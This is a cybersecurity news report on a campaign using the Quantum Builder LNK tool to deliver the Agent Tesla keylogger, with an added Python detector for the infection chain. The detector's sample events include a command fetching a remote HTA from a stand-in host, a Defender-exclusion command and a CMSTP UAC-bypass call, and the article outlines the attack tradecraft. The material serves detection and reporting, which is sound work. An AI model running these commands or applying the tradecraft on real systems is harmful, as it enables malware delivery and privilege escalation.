A recently discovered malware builder sold on the dark web, Quantum Builder, is being used in a new campaign featuring fresh tactics to deliver the Agent Tesla .NET-based keylogger and remote access trojan (RAT), according to an alert issued by the ThreatLabz research unit of cybersecurity firm Zscaler.
Quantum Builder, also known as Quantum LNK Builder, is used to create malicious shortcut files. It has been linked to Lazarus, an APT (advanced persistent threat) actor tied to North Korea, because of shared tactics, techniques, and procedures (TTPs) and source code overlap. "However we cannot confidently attribute this campaign to any specific threat actor," Zscaler noted in a blog post.
Agent Tesla was first detected in 2014. In the current campaign, Quantum Builder is being used to generate malicious .lnk, .hta, and PowerShell payloads, which then deliver Agent Tesla to the targeted machines, according to Zscaler.
"This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past," Zscaler noted.
Quantum Builder used in a string of recent malware attacks
Threat actors are continually evolving their tactics and making use of malware builders sold on the cybercrime market. "This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organizations," Zscaler noted.
The payloads generated by the builder make use of sophisticated techniques such as a user account control (UAC) bypass that uses the Microsoft Connection Manager Profile Installer (CMSTP) binary to execute the final payload with administrative privileges and to add Windows Defender exclusions.
The new malware campaign has also been seen employing a multistage infection chain that integrates various attack vectors, Zscaler said. It executes PowerShell scripts in memory to evade detection and has also been seen executing decoys to distract victims after devices have been infected.
New attacks begin with spear phishing email
The attack chain begins with a spear-phishing email that contains a GZIP attachment. The GZIP archive includes a shortcut designed to execute PowerShell code that is responsible for launching a remote HTML application using the mshta.exe binary.
The phishing email looks as if it comes from a Chinese supplier of lump and rock sugar. It has a subject line stating "New Order Confirmation – Guangdong Nanz Technology co. ltd." and carries a malicious .lnk file with a PDF icon.
Once the document is opened, the HTA file decrypts a PowerShell loader script, which in turn decrypts and loads another PowerShell script after performing Advanced Encryption Standard (AES) decryption and GZIP decompression.
The decrypted PowerShell script is the Downloader PS Script, which first downloads the Agent Tesla binary from a remote server and then executes it with administrative privileges by performing a user account control (UAC) bypass using CMSTP. Agent Tesla is then running on the target machine with administrative privileges.
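The chain above (shortcut launching PowerShell, PowerShell launching mshta.exe against a remote HTA, a PowerShell loader adding Windows Defender exclusions, and cmstp.exe being used from PowerShell for the UAC bypass) leaves a recognisable parent/child trail in process-creation telemetry. The following is an added example, not code from Zscaler ThreatLabz or from the article: a small Python detector that runs four checks keyed on those relationships over constructed process-creation events in the spirit of Sysmon Event ID 1. All events, paths, the `placeholder.invalid` host and the INF file name are constructed sample data, not indicators from the campaign.

```python
"""Detection sketch for the Quantum Builder / Agent Tesla infection chain.

Added example, not Zscaler's or the article's code. Four checks over
process-creation events reduced to pid, ppid, image path and command line:
  - explorer.exe -> powershell.exe -> mshta.exe (the .lnk launch)
  - mshta.exe with a remote http(s) address on its command line
  - powershell.exe adding a Windows Defender exclusion
  - cmstp.exe spawned by powershell.exe (the CMSTP UAC bypass stage)
Every event below is constructed sample data with placeholder names.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path of the new process
    cmdline: str    # command line of the new process


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased for comparison."""
    return PureWindowsPath(path).name.lower()


# Any http(s) address on the mshta.exe command line means a remote HTA.
REMOTE_URL_RE = re.compile(r"https?://", re.IGNORECASE)
# PowerShell adding a Defender exclusion for a path, process or extension.
DEFENDER_EXCLUSION_RE = re.compile(
    r"add-mppreference\b.*-exclusion(path|process|extension)", re.IGNORECASE
)


def detect(events):
    """Return (rule_name, pid) findings for the events, in event order."""
    by_pid = {e.pid: e for e in events}

    def parent_of(e):
        return by_pid.get(e.ppid) if e else None

    def name_of(e):
        return image_name(e.image) if e else ""

    findings = []
    for e in events:
        name = name_of(e)
        parent = parent_of(e)
        if name == "mshta.exe":
            # Shortcut double-clicked in Explorer -> PowerShell -> mshta.exe
            if (name_of(parent) == "powershell.exe"
                    and name_of(parent_of(parent)) == "explorer.exe"):
                findings.append(("lnk_powershell_mshta", e.pid))
            if REMOTE_URL_RE.search(e.cmdline):
                findings.append(("mshta_remote_hta", e.pid))
        elif name == "powershell.exe" and DEFENDER_EXCLUSION_RE.search(e.cmdline):
            findings.append(("defender_exclusion", e.pid))
        elif name == "cmstp.exe" and name_of(parent) == "powershell.exe":
            # A signed Microsoft profile installer has no normal reason to be a
            # child of PowerShell; the relationship is the signal, not the flags.
            findings.append(("cmstp_from_powershell", e.pid))
    return findings


# Constructed sample telemetry (placeholder host, paths and command lines).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # the .lnk with a PDF icon launches PowerShell (stage-1 code elided)
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -WindowStyle Hidden -Command "<constructed stage-1 code>"'),
    # PowerShell launches a remote HTA through mshta.exe
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://placeholder.invalid/order-confirmation.hta"),
    # the HTA's PowerShell loader adds a Defender exclusion
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -Command "Add-MpPreference -ExclusionPath C:\\Users\\Public"'),
    # the downloader stage runs cmstp.exe from PowerShell
    ProcEvent(500, 400, r"C:\Windows\System32\cmstp.exe",
              r"cmstp.exe C:\Users\Public\placeholder.inf"),
    # benign noise: an admin script and a vendor's local HTA help file
    ProcEvent(600, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcEvent(700, 100, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Program Files\Vendor\help.hta"),
]


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Because the later stages run PowerShell in memory, the command lines an analyst sees may be short or obfuscated, which is why three of the four checks key on the parent/child relationship rather than on strings in the command line; the benign local HTA and the admin script in the sample produce no findings.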
A second variant of Agent Tesla was also observed, in which the threat actors used a ZIP file and other sophisticated techniques to hide their activity. Agent Tesla has been active since 2014; in 2018 it had more than 6,300 customers paying subscription fees to license the software. Currently, Agent Tesla is being sold for $182 a month on the dark web, according to Hacker News.
Quantum Builder was first discovered by Cyble Research Labs in June this year on a cybercrime forum. The threat actor claimed in the post that Quantum Builder can spoof any extension and has over 300 different icons available for malicious .lnk files. A video was also posted demonstrating how to build .lnk, .hta, and .iso files using the malware builder.
The .hta payload can be created using Quantum Builder by customizing options such as payload URL, DLL (dynamic link library), UAC bypass, and execution path details, as well as a time delay before the payload executes.
Copyright © 2022 IDG Communications, Inc.